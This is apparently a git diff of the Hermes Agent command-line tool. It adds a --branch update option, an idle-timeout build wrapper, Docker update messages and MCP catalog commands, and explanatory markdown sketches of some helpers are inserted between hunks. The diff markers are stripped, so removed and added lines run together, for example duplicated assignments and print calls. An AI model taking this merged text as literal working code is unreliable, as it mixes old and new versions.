@@ -2084,6 +2117,13 @@ def cmd_postinstall(args):
def cmd_model(args):
"""Select default model — starts with provider selection, then model picker."""
_require_tty("model")
if getattr(args, "refresh", False):
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
print(" Cleared model picker cache.")
except Exception:
pass
select_provider_and_model(args=args)
@@ -2374,8 +2414,6 @@ def select_provider_and_model(args=None):
# Step 2: Provider-specific setup + model selection
if selected_provider == "openrouter":
_model_flow_openrouter(config, current_model)
elif selected_provider == "ai-gateway":
_model_flow_ai_gateway(config, current_model)
elif selected_provider == "nous":
_model_flow_nous(config, current_model, args=args)
elif selected_provider == "openai-codex":
@@ -2962,63 +3000,11 @@ def _model_flow_openrouter(config, current_model=""):
print("No change.")
def _model_flow_ai_gateway(config, current_model=""):
"""Vercel AI Gateway provider: ensure API key, then pick model with pricing."""
from hermes_constants import AI_GATEWAY_BASE_URL
from hermes_cli.auth import (
PROVIDER_REGISTRY,
_prompt_model_selection,
_save_model_choice,
deactivate_provider,
)
from hermes_cli.config import get_env_value
# Route through _prompt_api_key so users can replace a stale/broken key
# in-flow (K/R/C) instead of having to edit ~/.hermes/.env by hand.
pconfig = PROVIDER_REGISTRY["ai-gateway"]
existing_key = get_env_value("AI_GATEWAY_API_KEY") or ""
if not existing_key:
print(
"Create API key here: https://vercel.com/d?to=%2F%5Bteam%5D%2F%7E%2Fai-gateway&title=AI+Gateway"
)
print("Add a payment method to get $5 in free credits.")
print()
_resolved, abort = _prompt_api_key(pconfig, existing_key, provider_id="ai-gateway")
if abort:
return
from hermes_cli.models import ai_gateway_model_ids, get_pricing_for_provider
models_list = ai_gateway_model_ids(force_refresh=True)
pricing = get_pricing_for_provider("ai-gateway", force_refresh=True)
selected = _prompt_model_selection(
models_list, current_model=current_model, pricing=pricing
)
if selected:
_save_model_choice(selected)
from hermes_cli.config import load_config, save_config
cfg = load_config()
model = cfg.get("model")
if not isinstance(model, dict):
model = {"default": model} if model else {}
cfg["model"] = model
model["provider"] = "ai-gateway"
model["base_url"] = AI_GATEWAY_BASE_URL
model["api_mode"] = "chat_completions"
save_config(cfg)
deactivate_provider()
print(f"Default model set to: {selected} (via Vercel AI Gateway)")
else:
print("No change.")
def _model_flow_nous(config, current_model="", args=None):
"""Nous Portal provider: ensure logged in, then pick model."""
from hermes_cli.auth import (
get_provider_auth_state,
NOUS_INFERENCE_AUTH_MODE_LEGACY,
_prompt_model_selection,
_save_model_choice,
_update_config_for_provider,
@@ -3114,8 +3100,21 @@ def _model_flow_nous(config, current_model="", args=None):
# Fetch live pricing (non-blocking — returns empty dict on failure)
pricing = get_pricing_for_provider("nous")
# Check if user is on free tier
free_tier = check_nous_free_tier()
# Force fresh account data for model selection so recent credit purchases
# are reflected immediately.
free_tier = check_nous_free_tier(force_fresh=True)
if not free_tier:
try:
refreshed_creds = resolve_nous_runtime_credentials(
min_key_ttl_seconds=5 * 60,
inference_auth_mode=NOUS_INFERENCE_AUTH_MODE_LEGACY,
)
if refreshed_creds:
creds = refreshed_creds
except Exception:
# Runtime inference has its own paid-entitlement recovery path; do
# not block model selection if this opportunistic remint fails.
pass
# Resolve portal URL early — needed both for upgrade links and for the
# freeRecommendedModels endpoint below.
@@ -3137,7 +3136,24 @@ def _model_flow_nous(config, current_model="", args=None):
# newly-launched paid models surface in the picker too — independent
# of CLI release cadence.
unavailable_models: list[str] = []
unavailable_message = ""
if free_tier:
try:
from hermes_cli.nous_account import (
format_nous_portal_entitlement_message,
get_nous_portal_account_info,
)
_account_info = get_nous_portal_account_info(force_fresh=True)
unavailable_message = (
format_nous_portal_entitlement_message(
_account_info,
capability="paid Nous models",
)
or ""
)
except Exception:
unavailable_message = ""
model_ids, pricing = union_with_portal_free_recommendations(
model_ids, pricing, _nous_portal_url,
)
@@ -3159,7 +3175,7 @@ def _model_flow_nous(config, current_model="", args=None):
from hermes_cli.auth import DEFAULT_NOUS_PORTAL_URL
_url = (_nous_portal_url or DEFAULT_NOUS_PORTAL_URL).rstrip("/")
print(f"Upgrade at {_url} to access paid models.")
print(unavailable_message or f"Upgrade at {_url} to access paid models.")
return
print(
@@ -3172,6 +3188,7 @@ def _model_flow_nous(config, current_model="", args=None):
pricing=pricing,
unavailable_models=unavailable_models,
portal_url=_nous_portal_url,
unavailable_message=unavailable_message,
)
if selected:
_save_model_choice(selected)
@@ -6499,6 +6516,104 @@ def _web_ui_build_needed(web_dir: Path) -> bool:
return False
def _run_with_idle_timeout(
cmd: list[str],
cwd: Path,
*,
idle_timeout_seconds: int = 180,
indent: str = " ",
) -> subprocess.CompletedProcess:
"""Run a subprocess that streams output, with an idle-output timeout.
Issue #33788: ``npm run build`` (Vite) was invoked with
``capture_output=True`` and no timeout. On low-memory hosts (notably
WSL2 with the default 4 GB cap) the build can stall or sit silent for
minutes; users see a frozen terminal, assume the update is hung, and
reboot, leaving the editable install in a half-state with the
``hermes`` launcher present but ``hermes_cli`` not importable.
This helper fixes both halves: stdout is streamed (so the user sees
progress), and if no bytes have appeared on stdout/stderr for
``idle_timeout_seconds``, the process is terminated and the call
returns with a non-zero ``returncode``. The caller's existing
stale-dist fallback (#23817) takes over from there.
Returns a ``CompletedProcess`` with merged stdout (text), empty
stderr, and an integer returncode. Never raises on idle timeout;
propagation of failure is via the returncode.
"""
merged_chunks: list[str] = []
last_output_ts = _time.monotonic()
lock = threading.Lock()
try:
proc = subprocess.Popen(
cmd,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
encoding="utf-8",
errors="replace",
bufsize=1,
)
except OSError as exc:
# E.g. npm not on PATH between the which() check and now.
return subprocess.CompletedProcess(cmd, 127, stdout="", stderr=str(exc))
def _reader() -> None:
nonlocal last_output_ts
assert proc.stdout is not None
for line in proc.stdout:
try:
print(f"{indent}{line.rstrip()}", flush=True)
except UnicodeEncodeError:
# Windows cp1252 fallback — same pattern as _say().
enc = getattr(sys.stdout, "encoding", None) or "ascii"
safe = line.rstrip().encode(enc, errors="replace").decode(enc, errors="replace")
print(f"{indent}{safe}", flush=True)
with lock:
merged_chunks.append(line)
last_output_ts = _time.monotonic()
reader_thread = threading.Thread(target=_reader, daemon=True)
reader_thread.start()
idle_killed = False
while True:
try:
rc = proc.wait(timeout=5)
break
except subprocess.TimeoutExpired:
with lock:
idle = _time.monotonic() - last_output_ts
if idle > idle_timeout_seconds:
idle_killed = True
proc.terminate()
try:
rc = proc.wait(timeout=3)
except subprocess.TimeoutExpired:
proc.kill()
rc = proc.wait()
break
# Drain reader so we don't leak the stdout file descriptor.
reader_thread.join(timeout=2)
combined = "".join(merged_chunks)
if idle_killed:
msg = (
f"\n ⚠ Build produced no output for {idle_timeout_seconds}s — terminated.\n"
" Common causes: out-of-memory on a low-RAM host (WSL/container),\n"
" a stuck Node process, or an antivirus scan stalling I/O.\n"
)
combined += msg
# Force a non-zero rc even if terminate() raced with a clean exit.
if rc == 0:
rc = 124 # GNU `timeout` convention
return subprocess.CompletedProcess(cmd, rc, stdout=combined, stderr="")
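The watchdog pattern in `_run_with_idle_timeout` can be sketched in isolation. The version below is a simplified, hypothetical variant: the name `run_with_idle_timeout`, the `poll_seconds` parameter, and the tuple return value are assumptions for illustration and are not part of this diff. It omits the console echo and the Windows encoding fallback.

```python
import subprocess
import sys
import threading
import time


def run_with_idle_timeout(cmd, idle_timeout_seconds=180.0, poll_seconds=5.0):
    """Run cmd, terminating it if it stays silent for too long.

    Returns (returncode, merged_output, idle_killed).
    """
    chunks = []
    last_output = time.monotonic()
    lock = threading.Lock()
    proc = subprocess.Popen(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # merge stderr into stdout
        text=True,
        bufsize=1,  # line-buffered in text mode
    )

    def reader():
        # Each line of output resets the idle clock.
        nonlocal last_output
        for line in proc.stdout:
            with lock:
                chunks.append(line)
                last_output = time.monotonic()

    thread = threading.Thread(target=reader, daemon=True)
    thread.start()

    idle_killed = False
    while True:
        try:
            rc = proc.wait(timeout=poll_seconds)
            break
        except subprocess.TimeoutExpired:
            with lock:
                idle = time.monotonic() - last_output
            if idle > idle_timeout_seconds:
                idle_killed = True
                proc.terminate()
                try:
                    rc = proc.wait(timeout=3)
                except subprocess.TimeoutExpired:
                    proc.kill()  # escalate if terminate() was ignored
                    rc = proc.wait()
                break

    thread.join(timeout=2)  # let the reader drain remaining output
    if idle_killed and rc == 0:
        rc = 124  # same convention as GNU `timeout`
    return rc, "".join(chunks), idle_killed


if __name__ == "__main__":
    # A child that prints once and exits is not killed.
    print(run_with_idle_timeout([sys.executable, "-c", "print('ok')"], 5, 0.2))
```

The timeout is measured from the last line of output rather than from process start, so a slow build that keeps printing is never killed; only a silent one is.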
def _run_npm_install_deterministic(
npm: str,
cwd: Path,
@@ -6604,31 +6719,26 @@ def _build_web_ui(web_dir: Path, *, fatal: bool = False) -> bool:
if fatal:
_say(" Run manually: cd web && npm install && npm run build")
return False
# First attempt
r2 = subprocess.run(
[npm, "run", "build"],
cwd=web_dir,
capture_output=True,
text=True,
encoding="utf-8",
errors="replace",
)
# First attempt — stream output via idle-timeout helper (issue #33788).
# capture_output=True on a long Vite build looks identical to a hang;
# users react by rebooting, which leaves the editable install in a
# half-state. Streaming + idle-kill makes failures observable AND
# recoverable (the stale-dist fallback below handles the kill path).
r2 = _run_with_idle_timeout([npm, "run", "build"], cwd=web_dir)
if r2.returncode != 0:
# Retry once after a short delay — covers boot-time races on Windows
# (antivirus scanning Node.js binaries, npm cache not ready, transient
# I/O when launched via Scheduled Task at logon). See issue #23817.
_time.sleep(3)
r2 = subprocess.run(
[npm, "run", "build"],
cwd=web_dir,
capture_output=True,
text=True,
encoding="utf-8",
errors="replace",
)
r2 = _run_with_idle_timeout([npm, "run", "build"], cwd=web_dir)
if r2.returncode != 0:
stderr_preview = (r2.stderr or "").strip()
# _run_with_idle_timeout merges stderr into stdout; older callers
# using subprocess.run kept them split. Pull from whichever has
# content so the error surfaces regardless of which path produced
# the CompletedProcess.
build_output = (r2.stderr or "") + (r2.stdout or "")
stderr_preview = build_output.strip()
stderr_tail = "\n ".join(stderr_preview.splitlines()[-10:]) if stderr_preview else ""
dist_dir = web_dir.parent / "hermes_cli" / "web_dist"
dist_index = dist_dir / "index.html"
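Because the new helper merges stderr into stdout while `subprocess.run(capture_output=True)` keeps them split, the failure preview has to read from both fields. A minimal sketch of that idea follows; `failure_tail` and `max_lines` are hypothetical names, and the indentation the real code adds when joining lines is left out.

```python
import subprocess


def failure_tail(result: subprocess.CompletedProcess, max_lines: int = 10) -> str:
    """Return the last max_lines lines of whatever output the process produced."""
    # Either field may be None or empty depending on how the process was run.
    combined = ((result.stderr or "") + (result.stdout or "")).strip()
    if not combined:
        return ""
    return "\n".join(combined.splitlines()[-max_lines:])


if __name__ == "__main__":
    merged = subprocess.CompletedProcess(["npm"], 1, stdout="a\nb\nc\n", stderr="")
    print(failure_tail(merged, max_lines=2))
```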
@@ -6988,7 +7098,25 @@ def _update_via_zip(args):
import zipfile
from urllib.request import urlretrieve
branch = "main"
# The ZIP fallback exists for Windows git-file-I/O breakage. It pulls a
# static archive from GitHub, which is fine for the default "main"
# channel but would silently ignore --branch and update from main even
# if the user asked for something else — exactly the silent-divergence
# bug --branch was added to prevent. Refuse to proceed in that case
# rather than lie.
branch = _resolve_update_branch(args)
if branch != "main":
print(
f"✗ --branch={branch} is not supported on the Windows ZIP-fallback "
"update path."
)
print(
" This path runs when git file I/O is broken on the system. "
"Either resolve the git-side breakage (typically an antivirus "
"or NTFS filter holding files open) and rerun `hermes update "
f"--branch {branch}`, or update against main with `hermes update`."
)
sys.exit(1)
zip_url = (
f"https://github.com/NousResearch/hermes-agent/archive/refs/heads/{branch}.zip"
)
@@ -7101,6 +7229,11 @@ def _update_via_zip(args):
_install_python_dependencies_with_optional_fallback(pip_cmd)
_update_node_dependencies()
# Core (Python deps + git pull / ZIP extract) is now complete; the CLI
# is functional from this point onward. The web UI build below is
# optional — a failure here only affects ``hermes dashboard``. Make
# that visible so users don't panic and reboot mid-build (#33788).
print("→ Core update complete. Building dashboard (optional)...")
_build_web_ui(PROJECT_ROOT / "web")
# Sync skills
@@ -8129,37 +8262,18 @@ def _install_psutil_android_compat(
nothing is persisted in the repository.
Stopgap: remove this once https://github.com/giampaolo/psutil/pull/2762
merges and ships in a release. ``scripts/install_psutil_android.py``
contains the same logic for ``scripts/install.sh`` (fresh installs).
Both copies should be removed together.
merges and ships in a release. The standalone installer script uses the
same shared helper and should be removed together.
"""
import tarfile
import tempfile
import urllib.request
psutil_url = (
"https://files.pythonhosted.org/packages/aa/c6/"
"d1ddf4abb55e93cebc4f2ed8b5d6dbad109ecb8d63748dd2b20ab5e57ebe/"
"psutil-7.2.2.tar.gz"
)
from hermes_cli.psutil_android import PSUTIL_URL, prepare_patched_psutil_sdist
with tempfile.TemporaryDirectory() as tmp:
tmp_path = Path(tmp)
archive = tmp_path / "psutil.tar.gz"
urllib.request.urlretrieve(psutil_url, archive)
with tarfile.open(archive) as tar:
tar.extractall(tmp_path)
src_root = next(
p for p in tmp_path.iterdir() if p.is_dir() and p.name.startswith("psutil-")
)
common_py = src_root / "psutil" / "_common.py"
content = common_py.read_text(encoding="utf-8")
marker = 'LINUX = sys.platform.startswith("linux")'
replacement = 'LINUX = sys.platform.startswith(("linux", "android"))'
if marker not in content:
raise RuntimeError("psutil Android compatibility patch marker not found")
common_py.write_text(content.replace(marker, replacement), encoding="utf-8")
urllib.request.urlretrieve(PSUTIL_URL, archive)
src_root = prepare_patched_psutil_sdist(archive, tmp_path)
_run_install_with_heartbeat(
install_cmd_prefix + ["install", "--no-build-isolation", str(src_root)],
@@ -8395,13 +8509,44 @@ def _finalize_update_output(state):
pass
def _cmd_update_check():
"""Implement ``hermes update --check``: fetch and report without installing."""
def _resolve_update_branch(args) -> str:
"""Normalize ``args.branch`` into a non-empty branch name.
Centralizes the "default to main, accept --branch override, treat empty
or whitespace-only values as the default" parsing so every consumer of
``--branch`` (check path, git-update path, ZIP-fallback path) agrees on
the same answer.
"""
return (getattr(args, "branch", None) or "main").strip() or "main"
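The normalization above can be exercised on its own. The sketch below copies the one-line expression into a standalone function and pairs it with a throwaway `argparse` parser; the parser, its `prog` name, and the function name `resolve_update_branch` are assumptions for illustration only.

```python
import argparse


def resolve_update_branch(args) -> str:
    # Missing attribute, None, empty, and whitespace-only values all become "main".
    return (getattr(args, "branch", None) or "main").strip() or "main"


parser = argparse.ArgumentParser(prog="hermes-update-sketch")
parser.add_argument("--branch", default=None, metavar="NAME")

if __name__ == "__main__":
    for argv in ([], ["--branch", "  "], ["--branch", " bb/gui "]):
        ns = parser.parse_args(argv)
        # Mirrors how the diff computes branch_explicit for --check.
        explicit = bool(getattr(ns, "branch", None))
        print(argv, "->", repr(resolve_update_branch(ns)), "explicit:", explicit)
```

Note that a whitespace-only `--branch` value still counts as explicit under `bool(...)` even though it resolves to `main`, which is why the PyPI notice in `_cmd_update_check` also checks `branch != "main"`.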
def _cmd_update_check(branch: str = "main", *, branch_explicit: bool = False):
"""Implement ``hermes update --check``: fetch and report without installing.
``branch`` selects which branch the check compares against. Default is
"main"; callers can pass another branch to ask "are there new commits
on origin/<branch>?" without performing the update.
``branch_explicit`` is True iff the caller passed --branch on the CLI.
PyPI installs can't honor non-default branches, so when this is True
on a PyPI install we surface a one-line notice instead of silently
dropping the flag.
"""
from hermes_cli.config import detect_install_method
method = detect_install_method(PROJECT_ROOT)
if method == "docker":
# Docker can't ``git fetch`` from within the container. Surface the
# same long-form ``docker pull`` guidance ``hermes update`` (apply
# path) uses — telling the user to "reinstall via curl" or that
# ".git is missing" would point them at the wrong remediation.
from hermes_cli.config import format_docker_update_message
print(format_docker_update_message())
sys.exit(1)
if method == "pip":
from hermes_cli.config import recommended_update_command
from hermes_cli.banner import check_via_pypi
if branch_explicit and branch != "main":
print(f"⚠ --branch is ignored for PyPI installs (would have checked '{branch}').")
result = check_via_pypi()
if result is None:
print("✗ Could not reach PyPI to check for updates.")
@@ -8422,16 +8567,34 @@ def _cmd_update_check():
if sys.platform == "win32":
git_cmd = ["git", "-c", "windows.appendAtomically=false"]
# Fetch both origin and upstream; prefer upstream as the canonical reference
print("→ Fetching from upstream...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "upstream"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if fetch_result.returncode != 0:
# Fallback to origin if upstream doesn't exist
# Fetch both origin and upstream; prefer upstream as the canonical reference.
# Note: upstream/<branch> may not exist for non-main branches (a fork's
# bb/gui has no upstream counterpart), so when the caller picks a
# non-default branch we skip the upstream probe and use origin directly.
if branch == "main":
print("→ Fetching from upstream...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "upstream"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if fetch_result.returncode != 0:
# Fallback to origin if upstream doesn't exist
print("→ Fetching from origin...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "origin"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
upstream_exists = False
compare_branch = f"origin/{branch}"
else:
upstream_exists = True
compare_branch = f"upstream/{branch}"
else:
# Non-default branch: compare against origin/<branch> directly.
print("→ Fetching from origin...")
fetch_result = subprocess.run(
git_cmd + ["fetch", "origin"],
@@ -8440,10 +8603,7 @@ def _cmd_update_check():
text=True,
)
upstream_exists = False
compare_branch = "origin/main"
else:
upstream_exists = True
compare_branch = "upstream/main"
compare_branch = f"origin/{branch}"
if fetch_result.returncode != 0:
stderr = fetch_result.stderr.strip()
@@ -8457,6 +8617,20 @@ def _cmd_update_check():
print(f" {stderr.splitlines()[0]}")
sys.exit(1)
# Verify the compare ref actually exists before asking rev-list about it.
# Without this, `git rev-list HEAD..origin/<bogus> --count` exits 128 and
# (with check=True) raises CalledProcessError, surfacing a Python
# traceback. Friendlier to detect-and-report.
verify_result = subprocess.run(
git_cmd + ["rev-parse", "--verify", "--quiet", compare_branch],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if verify_result.returncode != 0:
print(f"✗ Branch '{branch}' not found on {compare_branch.split('/', 1)[0]}.")
sys.exit(1)
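The ref-selection rule in this function reduces to a small pure function. The sketch below restates it under that assumption; `pick_compare_ref` and `remote_of` are hypothetical names, and the actual `git fetch` calls are replaced by a boolean.

```python
def pick_compare_ref(branch: str, upstream_fetch_ok: bool) -> str:
    """Choose the ref that HEAD is compared against."""
    # Only the default branch is probed on upstream; other branches may
    # exist solely on the fork, so they always use origin.
    if branch == "main" and upstream_fetch_ok:
        return f"upstream/{branch}"
    return f"origin/{branch}"


def remote_of(compare_ref: str) -> str:
    # Split once so branch names containing "/" keep working.
    return compare_ref.split("/", 1)[0]


if __name__ == "__main__":
    ref = pick_compare_ref("bb/gui", upstream_fetch_ok=True)
    print(ref, remote_of(ref))
```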
rev_result = subprocess.run(
git_cmd + ["rev-list", f"HEAD..{compare_branch}", "--count"],
cwd=PROJECT_ROOT,
@@ -8668,14 +8842,35 @@ def cmd_update(args):
runs the update, then restores stdio on the way out (even on
``sys.exit`` or unhandled exceptions).
"""
from hermes_cli.config import is_managed, managed_error
from hermes_cli.config import (
detect_install_method,
format_docker_update_message,
is_managed,
managed_error,
)
if is_managed():
managed_error("update Hermes Agent")
return
# Docker users can't ``git pull`` — the image excludes ``.git`` from
# the build context. Bail with a friendly explanation pointing at
# ``docker pull`` BEFORE any of the apply-path / check-path branches
# below get a chance to error out with misleading "Not a git
# repository" text. See format_docker_update_message() for the full
# rationale and tag-pinning / config-persistence notes.
if detect_install_method(PROJECT_ROOT) == "docker":
print(format_docker_update_message())
sys.exit(1)
if getattr(args, "check", False):
_cmd_update_check()
# --check honors --branch so the "any new commits?" answer matches
# what a subsequent `hermes update --branch=<x>` would actually pull.
branch = _resolve_update_branch(args)
_cmd_update_check(
branch=branch,
branch_explicit=bool(getattr(args, "branch", None)),
)
return
gateway_mode = getattr(args, "gateway", False)
@@ -8835,26 +9030,57 @@ def _cmd_update_impl(args, gateway_mode: bool):
)
current_branch = result.stdout.strip()
# Always update against main
branch = "main"
# Determine the target branch. Default is "main" (the long-standing
# CLI behavior); --branch overrides for callers that want to update
# against a non-default channel.
branch = _resolve_update_branch(args)
# If user is on a non-main branch or detached HEAD, switch to main
if current_branch != "main":
# If user is on a different branch than the update target, switch
# to the target. When the target is "main" this is the historical
# "always update against main" behavior; for any other target it's
# the same thing — get HEAD onto the requested branch first, then
# fast-forward.
if current_branch != branch:
label = (
"detached HEAD"
if current_branch == "HEAD"
else f"branch '{current_branch}'"
)
print(f" ⚠ Currently on {label} — switching to main for update...")
print(f" ⚠ Currently on {label} — switching to {branch} for update...")
# Stash before checkout so uncommitted work isn't lost
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
subprocess.run(
git_cmd + ["checkout", "main"],
checkout_result = subprocess.run(
git_cmd + ["checkout", branch],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
check=True,
)
if checkout_result.returncode != 0:
# Local checkout doesn't have this branch yet. Try to set
# it up as a tracking branch of origin/<branch>. This is
# the common case when the requested branch exists upstream
# but was never checked out locally.
track_result = subprocess.run(
git_cmd + ["checkout", "-B", branch, f"origin/{branch}"],
cwd=PROJECT_ROOT,
capture_output=True,
text=True,
)
if track_result.returncode != 0:
# Restore the user's prior branch + stash before bailing
# so we don't leave them stranded in a weird state.
if auto_stash_ref is not None:
_restore_stashed_changes(
git_cmd,
PROJECT_ROOT,
auto_stash_ref,
prompt_user=False,
input_fn=gw_input_fn,
)
print(f"✗ Branch '{branch}' does not exist locally or on origin.")
if track_result.stderr.strip():
print(f" {track_result.stderr.strip().splitlines()[0]}")
sys.exit(1)
else:
auto_stash_ref = _stash_local_changes_if_needed(git_cmd, PROJECT_ROOT)
@@ -8876,6 +9102,11 @@ def _cmd_update_impl(args, gateway_mode: bool):
if commit_count == 0:
_invalidate_update_cache()
# Even if origin is up to date, the fork may be behind upstream
if is_fork and branch == "main":
_sync_with_upstream_if_needed(git_cmd, PROJECT_ROOT)
# Restore stash and switch back to original branch if we moved
if auto_stash_ref is not None:
_restore_stashed_changes(
@@ -8885,7 +9116,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
prompt_user=prompt_for_restore,
input_fn=gw_input_fn,
)
if current_branch not in {"main", "HEAD"}:
if current_branch not in {branch, "HEAD"}:
subprocess.run(
git_cmd + ["checkout", current_branch],
cwd=PROJECT_ROOT,
@@ -8907,7 +9138,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
try:
from hermes_cli.backup import create_quick_snapshot
snap_id = create_quick_snapshot(label="pre-update")
snap_id = create_quick_snapshot(label="pre-update", keep=1)
if snap_id:
print(f" ✓ Pre-update snapshot: {snap_id}")
except Exception as exc:
@@ -8947,7 +9178,7 @@ def _cmd_update_impl(args, gateway_mode: bool):
if reset_result.stderr.strip():
print(f" {reset_result.stderr.strip()}")
print(
" Try manually: git fetch origin && git reset --hard origin/main"
f" Try manually: git fetch origin && git reset --hard origin/{branch}"
)
sys.exit(1)
@@ -9077,6 +9308,10 @@ def _cmd_update_impl(args, gateway_mode: bool):
_refresh_active_lazy_features()
_update_node_dependencies()
# See note above (ZIP path): core is now complete, web UI build is
# optional from a CLI perspective. Telegraphing this avoids the
# "stuck at webui-build → reboot → broken install" trap (#33788).
print("→ Core update complete. Building dashboard (optional)...")
_build_web_ui(PROJECT_ROOT / "web")
print()
@@ -10683,6 +10918,22 @@ def cmd_dashboard(args):
sys.exit(1)
print(f"→ Skipping web UI build (--skip-build); using dist at {_dist_root}")
# Discover and load plugins so any DashboardAuthProvider plugin
# (e.g. plugins/dashboard_auth/nous) registers BEFORE start_server's
# fail-closed gate check runs. The top-level argparse setup skips
# plugin discovery for built-in subcommands like ``dashboard`` to
# save ~500ms startup; we have to trigger it explicitly here because
# the dashboard's server-side runtime depends on plugin-registered
# providers (image_gen, web, dashboard_auth, …).
try:
from hermes_cli.plugins import discover_plugins
discover_plugins()
except Exception as exc:
# Discovery failures must not block dashboard startup outright —
# log and proceed; the gate's fail-closed branch will surface
# the missing-provider state if it matters.
print(f"⚠ Plugin discovery failed: {exc}", file=sys.stderr)
from hermes_cli.web_server import start_server
embedded_chat = args.tui or os.environ.get("HERMES_DASHBOARD_TUI") == "1"
@@ -11067,6 +11318,11 @@ def main():
help="Select default model and provider",
description="Interactively select your inference provider and default model",
)
model_parser.add_argument(
"--refresh",
action="store_true",
help="Wipe the model picker disk cache and re-fetch every provider's live /v1/models list.",
)
model_parser.add_argument(
"--portal-url",
help="Portal base URL for Nous login (default: production portal)",
@@ -11253,6 +11509,19 @@ def main():
action="store_true",
help="Replace any existing gateway instance (useful for systemd)",
)
gateway_run.add_argument(
"--no-supervise",
action="store_true",
help=(
"Inside the s6-overlay Docker image, normally `gateway run` is "
"automatically redirected to the supervised s6 service (so the "
"gateway gets auto-restart on crash, plus a supervised dashboard "
"if HERMES_DASHBOARD is set). Pass --no-supervise to opt out and "
"get the historical pre-s6 foreground behavior: the gateway is "
"the container's main process and the container exits with the "
"gateway's exit code. No effect outside an s6 container."
),
)
_add_accept_hooks_flag(gateway_run)
_add_accept_hooks_flag(gateway_parser)
@@ -12399,6 +12668,11 @@ Examples:
],
)
skills_search.add_argument("--limit", type=int, default=10, help="Max results")
skills_search.add_argument(
"--json",
action="store_true",
help="Output JSON instead of a table (full identifiers, scripting-friendly)",
)
skills_install = skills_subparsers.add_parser("install", help="Install a skill")
skills_install.add_argument(
@@ -12496,6 +12770,31 @@ Examples:
help="Skip confirmation prompt when using --restore",
)
skills_repair_official = skills_subparsers.add_parser(
"repair-official",
help="Backfill or restore official optional skills from repo source",
description=(
"Repair official optional skill provenance. By default, only backfills "
"hub metadata for exact matches. Pass --restore to replace missing or "
"mutated active copies from optional-skills/, moving existing copies to "
"a restore backup first. Use name 'all' to repair every optional skill."
),
)
skills_repair_official.add_argument(
"name", help="Official optional skill folder/frontmatter name, or 'all'"
)
skills_repair_official.add_argument(
"--restore",
action="store_true",
help="Restore from official optional source, backing up existing matching copies",
)
skills_repair_official.add_argument(
"--yes",
"-y",
action="store_true",
help="Skip confirmation prompt when using --restore",
)
skills_publish = skills_subparsers.add_parser(
"publish", help="Publish a skill to a registry"
)
@@ -13018,6 +13317,24 @@ Examples:
)
mcp_login_p.add_argument("name", help="Server name to re-authenticate")
# ── Catalog (Nous-approved MCPs shipped with the repo) ─────────────────
mcp_sub.add_parser(
"picker",
help="Interactive catalog picker (also the default for `hermes mcp`)",
)
mcp_sub.add_parser(
"catalog",
help="List Nous-approved MCPs available for one-click install",
)
mcp_install_p = mcp_sub.add_parser(
"install",
help="Install a catalog MCP by name (e.g. `hermes mcp install n8n`)",
)
mcp_install_p.add_argument(
"identifier",
help="Catalog entry name (or `official/<name>`)",
)
_add_accept_hooks_flag(mcp_parser)
def cmd_mcp(args):
@@ -13431,6 +13748,17 @@ Examples:
default=False,
help="Assume yes for interactive prompts (config migration, stash restore). API-key entry is skipped; run 'hermes config migrate' separately for those.",
)
update_parser.add_argument(
"--branch",
default=None,
metavar="NAME",
help=(
"Update against this branch instead of the default (main). "
"If the local checkout is on a different branch, hermes will "
"switch to the requested branch first (auto-stashing any "
"uncommitted changes)."
),
)
update_parser.add_argument(
"--force",
action="store_true",
@@ -0,0 +1,776 @@
"""MCP catalog — curated, Nous-approved MCP servers shipped with the repo.
Mirrors the optional-skills/ pattern: each catalog entry lives under
``optional-mcps/<name>/manifest.yaml`` and ships disabled. Users discover
entries via ``hermes mcp catalog`` or the interactive ``hermes mcp picker``,
and install them with ``hermes mcp install <name>`` (or by toggling in the
picker, which flows them through any required env/OAuth setup).
Catalog policy:
- Entries are added only by merging a PR into hermes-agent. Presence in the
``optional-mcps/`` directory = Nous approval. No community tier, no trust
signals beyond "it's in the catalog".
- Manifests pin transport details (commands, args, refs). MCPs are never
auto-updated; users explicitly re-run ``hermes mcp install <name>`` to
pull a new manifest version after a repo update.
- Secrets prompted at install time go to ``~/.hermes/.env`` (the
.env-is-for-secrets rule). Non-secret env vars also go to .env to keep
one credential store.
See website/docs/user-guide/mcp-catalog.md for user docs.
See references/mcp-catalog.md (this repo's skill) for the manifest schema.
"""
from __future__ import annotations
import os
import re
import shutil
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import yaml
from hermes_constants import get_hermes_home, get_optional_mcps_dir
from hermes_cli.colors import Colors, color
from hermes_cli.config import (
load_config,
save_config,
get_env_value,
save_env_value,
)
from hermes_cli.cli_output import prompt as _prompt_input, prompt_yes_no
_MANIFEST_VERSION = 1
# Substituted at install time inside `transport.command` / `transport.args`.
_INSTALL_DIR_VAR = "${INSTALL_DIR}"
# ─── Data classes ────────────────────────────────────────────────────────────
@dataclass
class EnvVarSpec:
name: str
prompt: str
required: bool = True
secret: bool = True
default: str = ""
@dataclass
class AuthSpec:
type: str # "api_key" | "oauth" | "none"
env: List[EnvVarSpec] = field(default_factory=list)
# OAuth-specific (case 2: third-party provider like Google)
provider: Optional[str] = None
scopes: List[str] = field(default_factory=list)
env_var: Optional[str] = None
@dataclass
class TransportSpec:
type: str # "stdio" | "http"
command: Optional[str] = None
args: List[str] = field(default_factory=list)
url: Optional[str] = None
version: Optional[str] = None # informational, pinned
@dataclass
class InstallSpec:
"""Optional bootstrap step (git clone + dep install).
Omit for one-shot launchable servers (npx, uvx).
"""
type: str # "git"
url: str
ref: str # commit/tag/branch — pinned, never floats
bootstrap: List[str] = field(default_factory=list)
@dataclass
class ToolsSpec:
"""Manifest-side tool-selection hints.
Drives the pre-checked state of the install-time tool checklist, and acts
as the fallback selection when probe fails. See install_entry() flow.
"""
